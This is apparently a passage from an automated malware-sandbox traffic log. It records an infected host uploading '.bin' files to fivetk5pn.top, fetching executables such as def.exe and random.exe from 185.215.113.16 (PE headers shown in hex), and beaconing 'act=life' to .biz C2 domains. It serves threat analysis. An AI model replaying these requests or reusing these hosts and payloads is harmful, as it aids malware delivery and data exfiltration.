Dec 17, 2024 06:04:20.833049059 CET	1236	IN	Data Raw: bb 31 9a 4e c2 a8 b1 a7 91 5f 9e c7 a9 60 a4 a7 26 41 b1 c3 99 44 aa d3 b4 3d 2b 5f c8 a0 ed ad 59 b2 a0 46 5b b5 62 f7 9f d8 ad 5e d2 dd f9 20 ca 1d d8 5e 20 14 db bc 9d fe ae a9 45 2d 9e 2b d9 43 9c b4 0b 1f 08 b6 db 40 bc 86 a7 f1 a4 02 94 2e Data Ascii: 1N_`&AD=+_YF[b^ ^ E-+C@.ET5J!/_1&B~w>#k.\t4[NLo[tO7r6jS\|n
Dec 17, 2024 06:04:20.952600956 CET	1236	IN	Data Raw: 06 e8 a2 0c ab f5 5e 02 2c 8a 39 b6 b6 59 b8 51 72 7a 56 b0 65 6e a0 a7 46 80 6d b2 a2 77 cc 7f fc 4b b4 ad 6f c6 1d 2d fe c8 af f3 a3 e6 f1 a7 ba 92 92 5e 7a 5f 83 50 fd 88 bf 66 25 66 53 fc f8 ad 12 6a 5a 68 a2 33 3b 53 8d 73 6a 5a 50 0c 48 77 Data Ascii: ^,9YQrzVenFmwKo-^z_Pf%fSjZh3;SsjZPHwT`ihQjJd<]5}1TLrJ^g_mX^;n_r[NsmO0`^>+vKk?u]l5>0tou^4)

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.5	50046	104.154.220.71	80

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:04:19.602541924 CET	644	OUT	POST /v1/upload.php HTTP/1.1 Host: fivetk5pn.top Accept: / Content-Length: 465 Content-Type: multipart/form-data; boundary=------------------------T63B6A2NSBT32bJpWgOuSy Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 54 36 33 42 36 41 32 4e 53 42 54 33 32 62 4a 70 57 67 4f 75 53 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 76 75 6d 6f 71 61 6c 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a da 69 55 6b c1 d1 a3 ab 5d 10 52 af 0e 3b c4 bd d4 0c 31 76 2c 16 3f 54 63 bc 4b 0d 7d c0 30 10 08 70 df 3d c7 85 af ee 4d 1f 4c 6e 08 dd 77 4d d8 1b 20 e8 a1 fc 05 bf dd 89 76 2b be 3a 32 a4 77 3c 80 d3 3b da a2 20 12 d2 09 26 81 37 10 2b 91 e7 45 bc 2d 0f 35 cf 9a e4 e8 0b 12 09 ad 6f 7c f4 62 1a dd a6 f7 cd f9 6c 67 f7 d2 9b ec 77 ad af a3 1e 3a 1d 81 55 0a 97 41 8d 25 95 86 5c 95 97 92 d9 2b e0 e5 f7 06 45 81 6c 6e fb 64 fa e1 67 54 7c 6a 4c 0b 5c ff 26 27 ba 5a d3 1e 13 ae 5a f3 19 e0 49 db da 9d 70 ab 0a 95 3b 26 [TRUNCATED] Data Ascii: --------------------------T63B6A2NSBT32bJpWgOuSyContent-Disposition: form-data; name="file"; filename="Covumoqal.bin"Content-Type: application/octet-streamiUk]R;1v,?TcK}0p=MLnwM v+:2w<; &7+E-5o\|blgw:UA%\+ElndgT\|jL\&'ZZIp;&j*';[aXcu'yIyP=1LP!;N}>&))s--------------------------T63B6A2NSBT32bJpWgOuSy--
Dec 17, 2024 06:04:21.025209904 CET	255	IN	HTTP/1.1 200 OK server: nginx date: Tue, 17 Dec 2024 05:04:20 GMT content-type: text/plain; charset=utf-8 content-length: 2 x-ratelimit-limit: 30 x-ratelimit-remaining: 29 x-ratelimit-reset: 1734413661 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	50055	104.154.220.71	80

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:04:22.502615929 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: fivetk5pn.top Accept: / Content-Length: 58949 Content-Type: multipart/form-data; boundary=------------------------7pC2pD8S68iPrFxOagvxhM Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 70 43 32 70 44 38 53 36 38 69 50 72 46 78 4f 61 67 76 78 68 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 65 78 61 74 69 66 65 70 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a dc 19 b3 b5 70 57 2e fb 58 56 19 d2 9a d7 02 20 ab 30 a6 1d 83 af 55 4d 4d f9 b1 69 c8 a5 71 88 c3 c2 57 af c4 62 37 d2 f1 f2 8a cc 1a 9b e2 94 33 d2 a8 ff 2f e1 e4 45 43 f1 58 a5 f1 3f 86 4d bf 93 4c 6b bf 5d de 7b 8d 5b 64 53 9a b6 24 03 8d 6a 6a 95 e4 e3 92 fd 39 13 f7 33 e3 d1 d7 49 d4 df 47 78 2d 85 a2 f5 86 c9 1f fc 62 7d 86 5d 6d 7e 56 ef 66 02 89 7d c9 d2 03 b9 de 91 ae 6e 8d ac 00 63 90 53 dd 71 3c 42 6f 3d 0c ac 4d 3b 68 d1 74 0a 9e a9 0a 00 25 32 3d 87 f8 2b de cd 6d 25 82 b0 32 a1 da a1 68 42 e3 a9 3b 9b e7 [TRUNCATED] Data Ascii: --------------------------7pC2pD8S68iPrFxOagvxhMContent-Disposition: form-data; name="file"; filename="Qexatifep.bin"Content-Type: application/octet-streampW.XV 0UMMiqWb73/ECX?MLk]{[dS$jj93IGx-b}]m~Vf}ncSq<Bo=M;ht%2=+m%2hB;!#iEjS!`c9<jSC;?@,Jq4_Su`UMihlWjN^X@9@nKTc^,"98. a5qHjKF<r-crx{=gR3.3Da@sVZ\|x8dHa zv} ?I>[.Y7x 4^+yu9k`mxvUgH@5wk%VJO3FuYd'E;;3a`8~VOb! t3b_W\}%Pd[^-BhmMs~4'\|O)E 9!.)\'RzY<NDPJcas$inStt!^vj6rQ-@DsVR:h_EDKrJ\fg0RET?w)BHlL 3\|3i7>o hz,6=B\|QBP\|QU:xV< [TRUNCATED]
Dec 17, 2024 06:04:22.622478962 CET	2472	OUT	Data Raw: e4 32 74 8b d1 f0 03 f7 e6 0b 58 0b 94 06 2c 06 bb 1e 40 50 53 88 59 2a 4c a5 ea 81 cf 3d bf 67 c6 ee 10 82 d0 17 9e 93 54 8e ca 10 88 e2 65 9d 43 be 36 0d 70 3f a8 0a aa 64 e6 fd f5 19 bb 3d e8 f3 7b 3d 4a e0 9a 0c 55 b6 ff 68 41 bc a6 82 79 4e Data Ascii: 2tX,@PSYL=gTeC6p?d={=JUhAyN(hvUVmIw>qvL2z^VLhSb>hL#6;o4LTwmx&HRGuw\PGX.3$d]J9L#i>NX6
Dec 17, 2024 06:04:22.622634888 CET	4944	OUT	Data Raw: fc e0 02 d0 52 33 be 94 e0 9b cc ef fa 5a c1 57 72 c2 4a d4 17 9f 4d eb 65 c3 00 00 0c 19 fa 83 e5 55 d3 e3 da eb 9b 98 62 c6 06 cc 4a a3 58 cf 85 8c 05 ee f1 95 ea ec 14 c2 98 28 b0 f3 c2 da 0e a6 54 ce 30 1b ce a9 fc ef b2 4b 1e ad 21 58 db 0c Data Ascii: R3ZWrJMeUbJX(T0K!X\$&B+'TGdk{BE\|dL*nyg4wZ^hG1z,zbR5u#X':'\|uv>Ar"qOHj?8fKB"H;!B
Dec 17, 2024 06:04:22.622783899 CET	2472	OUT	Data Raw: 8c 3e a7 ad 12 7f dd a0 56 6c ee 82 71 30 9f 1a 63 00 a1 98 68 03 8b 4a 86 a8 dc f2 fb 48 32 7e c1 70 ed b9 bf b5 6b 7f 40 a6 ca 65 c8 f0 41 25 8f df ce d6 b2 05 3d dd 25 e7 6b 98 79 e7 12 24 36 a2 96 9b 3c 4f 65 be 1b 52 99 0c 14 30 d5 7f 49 c9 Data Ascii: >Vlq0chJH2~pk@eA%=%ky$6<OeR0I<>j-kZ,ME/r.s3C4S$?6c$ta4wZ.oj}AE.kc~,W<))R=uBuU1\|Z>>
Dec 17, 2024 06:04:22.622800112 CET	2472	OUT	Data Raw: 68 38 96 97 93 f7 aa 40 da da 14 09 93 da e3 70 8b a2 c4 2a f5 85 b8 50 c5 0b d6 3a 55 9e 84 89 ca 82 f0 cf eb e0 ba be ec 08 ea 51 69 0b 0e 54 58 0d cc 7f 1c db 2f 8b c8 5f cc 16 ca 71 8f 7f 8e 84 d6 a8 eb d7 c9 18 b2 28 d7 b7 08 7a 9c b4 6c 61 Data Ascii: h8@p*P:UQiTX/_q(zlaW3.vz [\|Q\|d5ASI\E3s>WcxbU`f=<k)Kzo&d&Nf-V5QzV-_O,Yja+m
Dec 17, 2024 06:04:22.622827053 CET	2472	OUT	Data Raw: 30 f5 de 7e 11 b4 cd 14 62 72 02 6e 51 7a 8d 02 0a 45 ec 42 d9 70 04 ca 0b 1f ae 14 eb e8 60 51 20 16 8f 94 ba 63 31 9a 6b a2 40 48 6d 87 8b 0e b8 da dd 9d 81 3e 45 13 92 fd 28 b3 00 d8 a4 eb d6 67 08 20 7f b3 b6 68 ef 2c 09 42 27 52 bb 4e 70 97 Data Ascii: 0~brnQzEBp`Q c1k@Hm>E(g h,B'RNpc`pUrJu@sPS#y'5ic]dt*M%^~Yf7deJQ0mb0>0[8ExDN@vyuN=/n3-d6R.iX
Dec 17, 2024 06:04:22.622848034 CET	2472	OUT	Data Raw: 34 52 0d 1c 77 1c 04 21 89 4d c5 e6 fb cb 15 1e 6b eb 96 5f ad d0 b8 f9 74 2e 61 fa 81 38 ca db c7 b0 76 b7 b6 6d 9d 41 d7 d8 d8 ef 13 03 cd 42 91 57 7f 9b e9 20 2a d6 dd 8e 7c ee 6a 6b 64 b7 01 f0 3a da 34 55 85 49 f8 84 dc 2c 4a d8 1e 94 96 83 Data Ascii: 4Rw!Mk_t.a8vmABW \|jkd:4UI,J&Al)>C#6_cJ"AEKOaX^_r7RxJ8W,r)8.w\|3toQP!+6=87D]nn#qkSin2[rVQ
Dec 17, 2024 06:04:22.622931957 CET	2472	OUT	Data Raw: 68 e6 b4 9b ce 3a 2e 2b 6e 2a f1 96 08 16 c4 98 74 5a 50 a0 cc e5 cf ca ec c2 69 62 ae 0d 0f e3 22 6d 2a e1 e4 34 be b0 36 b8 22 d0 96 58 a8 8f 7d 6b 9b 42 5f 94 66 a9 e2 68 66 f6 f0 8a 3e e8 dd 5d c9 e4 64 dc 81 6a c8 68 f3 7c 98 04 24 12 85 06 Data Ascii: h:.+ntZPib"m46"X}kB_fhf>]djh\|$HL8]``?-bWWWD'gYI\6+Tqz\:}pl3n/=,{8,!N$Vo*jq)+A>QtJ~V!c6iB1}P
Dec 17, 2024 06:04:22.622961044 CET	2472	OUT	Data Raw: 91 00 a3 8a 5e c2 81 f1 80 40 59 2c ff ea 8a 56 32 64 3e eb e9 ad 58 6e c5 9c 38 19 5e 01 00 d0 f4 40 53 81 89 48 d8 68 1d 47 1a 9f 11 9f 22 9e d1 de 2b 1f 41 28 83 f5 b4 bd ee 32 db f6 62 e7 8f 14 fd e2 74 b3 c5 1b ca cb 0e c0 86 47 7a 2d 96 f3 Data Ascii: ^@Y,V2d>Xn8^@SHhG"+A(2btGz-]Z#q,ib!_n/l":8fa~*1.:x&c!Tu"Y3oki;=(\'}cdh wd2bZx%ZdP'`Aw
Dec 17, 2024 06:04:22.623007059 CET	2472	OUT	Data Raw: 79 8d c4 95 00 72 10 4a af 06 5c e0 99 b1 1e 45 29 1f cd 6e 42 fa 02 87 7a 34 7a 9f e1 6c 32 3e 48 70 fe 74 82 2f 53 22 13 a5 9f bf d9 65 6a 5d c7 53 03 e7 e8 28 75 37 e4 06 ee fd 17 c9 8b 56 f6 99 6d 05 84 2d 75 ba 01 6e 01 a4 00 ed e3 d9 7f c8 Data Ascii: yrJ\E)nBz4zl2>Hpt/S"ej]S(u7Vm-unVd.pwSdT{%r$5M0'v~CiB241=2I'^L^6hs$sK.7ffk5fb0ReoX<&y*ybXf!OZyd9p
Dec 17, 2024 06:04:22.756505013 CET	14832	OUT	Data Raw: 1b 26 e9 5d ca 4e 0b 98 a8 93 cf d6 5f f8 7a 7a ac 3c d1 7c 9e 9a 23 a8 3d dc 74 c8 a3 d2 3d 0c eb f2 00 f3 e3 3e e8 62 09 3c 94 45 cd cd 80 eb d4 90 4d 94 fe 43 ff 51 36 b8 2a 6e 52 7b 28 40 cb bd 26 49 4e cc a8 5d ac a2 5d 88 1d 62 2d 24 7d b1 Data Ascii: &]N_zz<\|#=t=>b<EMCQ6*nR{(@&IN]]b-$}g+My.PX>fOtKAj\;uN>Jqn~F[jd3\|P@J3065G[`v#^`gBTa4'XJJ'<Dhr
Dec 17, 2024 06:04:24.201426983 CET	255	IN	HTTP/1.1 200 OK server: nginx date: Tue, 17 Dec 2024 05:04:23 GMT content-type: text/plain; charset=utf-8 content-length: 2 x-ratelimit-limit: 30 x-ratelimit-remaining: 28 x-ratelimit-reset: 1734413661 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	50076	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:04:30.480133057 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 17, 2024 06:04:31.810692072 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:04:31 GMT Content-Type: application/octet-stream Content-Length: 1717760 Last-Modified: Tue, 17 Dec 2024 04:39:32 GMT Connection: keep-alive ETag: "67610084-1a3600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 44 00 00 04 00 00 ad ae 1a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`D `@ D`Ui`D @ @.rsrcD`2@.idata 6@ )8@cllxmxcj`*:@xpgytcmm @D@.taggant@`D"@
Dec 17, 2024 06:04:31.810755968 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:31.810791969 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:31.810844898 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:31.810878992 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:31.810914040 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:31.811013937 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:31.811065912 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:31.811099052 CET	1236	IN	Data Raw: 63 9f a7 0d 94 bb ac 23 24 c2 42 ba 35 27 60 64 ea ea af 97 c8 21 ba af db ee fc b8 58 6c df 69 99 f6 17 ad d9 63 99 6c 2a 7b df 79 1b 0a a8 ae e1 22 ac f8 d2 c8 d2 6d 57 e5 79 03 d7 10 6d 65 33 5e c0 a5 52 af 99 35 95 20 41 be 50 49 ac 34 b2 a0 Data Ascii: c#$B5'`d!Xlicl*{y"mWyme3^R5 API4PZ}QtPmVyO,>Up?z+MpxC2Ja>(_ hA1P3"3y]HRJaCi2,QbZ`Y,85I3<#
Dec 17, 2024 06:04:31.811132908 CET	1236	IN	Data Raw: bb 31 9a 4e c2 a8 b1 a7 91 5f 9e c7 a9 60 a4 a7 26 41 b1 c3 99 44 aa d3 b4 3d 2b 5f c8 a0 ed ad 59 b2 a0 46 5b b5 62 f7 9f d8 ad 5e d2 dd f9 20 ca 1d d8 5e 20 14 db bc 9d fe ae a9 45 2d 9e 2b d9 43 9c b4 0b 1f 08 b6 db 40 bc 86 a7 f1 a4 02 94 2e Data Ascii: 1N_`&AD=+_YF[b^ ^ E-+C@.ET5J!/_1&B~w>#k.\t4[NLo[tO7r6jS\|n
Dec 17, 2024 06:04:31.930726051 CET	1236	IN	Data Raw: 06 e8 a2 0c ab f5 5e 02 2c 8a 39 b6 b6 59 b8 51 72 7a 56 b0 65 6e a0 a7 46 80 6d b2 a2 77 cc 7f fc 4b b4 ad 6f c6 1d 2d fe c8 af f3 a3 e6 f1 a7 ba 92 92 5e 7a 5f 83 50 fd 88 bf 66 25 66 53 fc f8 ad 12 6a 5a 68 a2 33 3b 53 8d 73 6a 5a 50 0c 48 77 Data Ascii: ^,9YQrzVenFmwKo-^z_Pf%fSjZh3;SsjZPHwT`ihQjJd<]5}1TLrJ^g_mX^;n_r[NsmO0`^>+vKk?u]l5>0tou^4)
Dec 17, 2024 06:04:34.811625957 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 17, 2024 06:04:35.254671097 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:04:34 GMT Content-Type: application/octet-stream Content-Length: 2959872 Last-Modified: Tue, 17 Dec 2024 04:41:09 GMT Connection: keep-alive ETag: "676100e5-2d2a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 60 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 50 00 00 04 00 00 ee ab 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg*`P@P-@M$a$$ $h@.rsrc$x@.idata $\|@doyjdknv+$+~@vjvesdafPP-@.taggant0`P"-@

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	50096	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:04:47.678386927 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49849	104.131.68.180	443	1524	C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:03:17 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-17 05:03:17 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-17 05:03:17 UTC	94	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:03:17 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49856	178.62.201.34	443	1524	C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:03:20 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-17 05:03:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-17 05:03:21 UTC	94	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 05:03:20 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49866	104.121.10.34	443	1524	C:\Users\user\AppData\Local\Temp\1016489001\e66237da20.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 05:03:24 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-17 05:03:24 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 17 Dec 2024 05:03:24 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=90f637ae47e1a50f095eeaa5; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-17 05:03:24 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
